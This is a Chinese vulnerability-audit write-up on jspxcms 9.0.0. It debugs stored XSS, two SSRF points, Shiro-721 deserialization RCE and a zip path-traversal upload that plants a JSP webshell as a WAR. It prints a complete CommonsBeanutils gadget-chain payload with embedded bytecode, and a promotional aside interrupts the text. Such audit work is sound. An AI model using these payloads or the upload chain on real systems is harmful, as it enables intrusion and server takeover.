一次历史漏洞分析与复现的全部过程
环境需求
- 系统:Windows10
- 中间件:https://dlcdn.apache.org/tomcat/tomcat-9/v9.0.58/bin/apache-tomcat-9.0.58-windows-x64.zip
- 数据库:用phpstudy携带的5.7.26版本即可
- jspxcms安装包(部署到Tomcat用来复现):https://www.ujcms.com/uploads/jspxcms-9.0.0-release.zip
- jspxcms源码包(部署到IDEA进行分析):https://www.ujcms.com/uploads/jspxcms-9.0.0-release-src.zip
部署过程
一、jspxcms安装包部署到Tomcat
解压好jspxcms安装包后,将Tomcat的ROOT目录替换为jspxcms的ROOT目录。
image修改application.properties数据库信息,最后启动Tomcat就部署完成了。
image二、jspxcms源码部署到IDEA
使用IDEA打开解压好的源码目录,由于使用了SpringBoot,直接启用主程序Application即可。
漏洞复现
一、XSS
在首页随便打开一条新闻,评论需要登录,先注册一个用户,然后提交评论,使用burpsuite抓包。
image查看请求包可以看到请求路径是/comment_submit,通过路径定位到源码。
image【→所有资源关注我,私信回复“资料”获取←】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记
在IDEA使用Ctrl+Shift+F搜索comment_submit,很容易就可以找到,在此处下断点进行调试。
image重新发布一条评论,回到 IDEA,可以看到变量 text 接收了评论的内容,然后又调用了 submit。
image跟进这个 submit,在调用 service 层进行业务处理的位置下断点。可以看到使用了 comment 对象的属性去保存 text 然后传递给 service.save ,text 的内容没有被改变。跟进 service.save 在调用 dao 层的位置下断点。
image可以看到看到 text 的内容还是没有改变,跟到这里就行了,因为 dao 层一般只做跟数据库相关的操作,不会有任何安全处理。就这样评论的内容被写入到数据库了。
image image但是在文章页面并没有触发XSS,所以需要寻找是否有其他页面可以触发。在 burpsute 可以看到评论的内容在请求 /comment_list 时得到,并且该内容进行了HTML实体编码。使用 IDEA 的搜索功能查找该前端页面。
image image直接到实际处理数据的 list 方法下断点进行调试。跟进 site.getTemplate 可以看到前端页面路径是 /1/default/sys_comment_list.html。
image image查看该页面是如何做转义处理的,在 pom.xml 查看项目依赖,可以看到项目使用的前端框架是 freemarker。结合 sys_comment_list.html 的内容与说明文档可知前端页面使用了 escape 标签进行 HTML 实体编码。
image image image那么找找跟评论相关并且没有 escape 标签的前端页面,找到了 sys_member_space_comment.html 符合条件。使用IDEA搜索,查看如何才能访问到 sys_member_space_comment.html,可以看到在 sys_member_space.html 下参数 type 等于 comment 那么 sys_member_space_comment.html 就会被包含 。
image查看如何访问 sys_member_space.html,可以看到文件名被定义为常量,space 方法使用了该常量,也就是说访问路径的格式为 /space/{id} 时就能触发 XSS 了。
image imageXSS漏洞触发效果如下所示。
image二、SSRF
审计 SSRF 时需要注意的敏感函数:
URL.openConnection ()
URL.openStream ()
HttpClient.execute ()
HttpClient.executeMethod ()
HttpURLConnection.connect ()
HttpURLConnection.getInputStream ()
HttpServletRequest ()
BasicHttpEntityEnclosingRequest ()
DefaultBHttpClientConnection ()
BasicHttpRequest ()
第一处 SSRF:
直接使用 IDEA 搜索敏感函数,找到一处使用了 HttpClient.execute() 的方法 fetchHtml(),它被当前类的另一个 fetchHtml() 调用。
在 fetchUrl() 调用了 fetchHtml(),并且这个方法可以直接被 HTTP 访问。
image使用 python 开启一个简易的 http 服务进行测试,测试效果如下所示,成功触发 SSRF。
image image第二处 SSRF:
搜索 openConnection ,可以看到在方法 ueditorCatchImage() 下,参数 source[] 直接可控,当执行到 conn.getContentType().indexOf("image") 时就会去请求相应的资源。
搜索调用 ueditorCatchImage() 方法的位置,可以看到访问路径为 /ueditor,action 参数需要等于 catchimage。
image构造 payload 触发漏洞,如下所示成功触发 SSRF。
image image三、RCE
第一处 反序列化RCE
在审计 RCE 时需要先查看项目使用了哪些依赖包,可以看到项目中的依赖包符合 ysoserial 中的 CommonsBeanutils1 的条件,但是依赖包版本有一些差异。
我们直接在项目中创建一个 test 类进行测试,查看反序列化是否能成功执行,我在测试时发现反序列 ysoserial 的 CommonsBeanutils1 并不能成功,然后我使用之前跟p牛学的payload可以成功弹出计算器,如下图所示。
imagePayload:
package com.jspxcms.core.test ;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl ;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl ;
import org.apache.commons.beanutils.BeanComparator ;
import java.io.* ;
import java.lang.reflect.Field ;
import java.util.Base64 ;
import java.util.PriorityQueue ;
public class test {
public static void main ( String [] args ) throws Exception {
byte [] code = Base64 . getDecoder (). decode ( "yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAHTEhlbGxvOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAlAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYHACYBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwAGQAaBwAnDAAoACkBAAhjYWxjLmV4ZQwAKgArAQAFSGVsbG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAAPwAAAAMAAAABsQAAAAIACgAAAAYAAQAAAAwACwAAACAAAwAAAAEADAANAAAAAAABAA4ADwABAAAAAQAQABEAAgASAAAABAABABMAAQAHABQAAgAJAAAASQAAAAQAAAABsQAAAAIACgAAAAYAAQAAABEACwAAACoABAAAAAEADAANAAAAAAABAA4ADwABAAAAAQAVABYAAgAAAAEAFwAYAAMAEgAAAAQAAQATAAEAGQAaAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAAEwAEABQADQAVAAsAAAAMAAEAAAAOAAwADQAAABIAAAAEAAEAGwABABwAAAACAB0=" );
TemplatesImpl obj = new TemplatesImpl ();
setFieldValue ( obj , "_bytecodes" , new byte [][]{ code });
setFieldValue ( obj , "_name" , "xxx" );
setFieldValue ( obj , "_tfactory" , new TransformerFactoryImpl ());
BeanComparator comparator = new BeanComparator ( null , String . CASE_INSENSITIVE_ORDER );
PriorityQueue queue = new PriorityQueue ( 2 , comparator );
queue . add ( "x" );
queue . add ( "x" );
setFieldValue ( comparator , "property" , "outputProperties" );
setFieldValue ( queue , "queue" , new Object []{ obj , obj });
ObjectOutputStream out = new ObjectOutputStream ( new FileOutputStream ( "src\main\java\com\jspxcms\core\test\ser.txt" ));
out . writeObject ( queue );
out . close ();
ObjectInputStream in = new ObjectInputStream ( new FileInputStream ( "src\main\java\com\jspxcms\core\test\ser.txt" ));
in . readObject ();
in . close ();
}
private static void setFieldValue ( Object obj , String field , Object arg ) throws Exception {
Field f = obj . getClass (). getDeclaredField ( field );
f . setAccessible ( true );
f . set ( obj , arg );
}
}
经过测试反序列漏洞是可以利用的,现在需要一处接收反序列化数据触发漏洞的点。继续查看依赖包发现使用了 Apache Shiro 并且版本小于 1.4.2,可以利用 Shiro-721。这里我使用 https://github.com/inspiringz/Shiro-721 进行测试。
image爆破出可以攻击的 rememberMe Cookie 大概需要一个多小时,如下界面所示。
image进行测试成功弹出计算器,反序列化 RCE 利用成功。
image第二处 文件上传RCE
这个漏洞在文件管理的压缩包上传功能,上传的压缩包会被自动解压,如果我们在压缩包中放入 war 包并配合解压后目录穿越 war 包就会被移动到 tomcat 的 webapps 目录,而 tomcat 会自动解压 war 包。
这里我使用冰蝎的 jsp webshell ,将 webshell 打包成 war 包。
image然后将 war 包打包成压缩文件。
image注意:这里测试需要启动 tomcat 做测试,而不是 IDEA 的 SpringBoot,否则可能无法成功。
上传完之后连接 webshell 成功 RCE。
分析漏洞产生的原因,抓取文件上传的请求包,通过请求路径使用 IDEA 定位到代码。
image image到 super.zipUpload 处下断点进行调试,继续跟入 AntZipUtils.unzip()。
image可以看到文件名没有做安全处理,执行到 fos.write 时 shell.war 就被写入到 tomcat 的 webapps 目录了,这里的目录名不太对劲,因为是在 IDEA 启动 SpringBoot 进行调试的,无须在意,分析到这里就结束了。
image为什么不直接上传 jsp 文件 getshell 呢?我们试一下,发现响应 404 文件不存在,并且文件路径前加了 /jsp。
image通过调试发现 JspDispatcherFilter.java 会对访问的 jsp 文件路径前加 /jsp,这就是不直接上传 jsp 文件 getshell的原因。而我们使用压缩包的方式会将 shell.war 解压到 tomcat 的 webapps 目录,这相当于一个新的网站项目JspDispatcherFilter.java 是管不着的。
image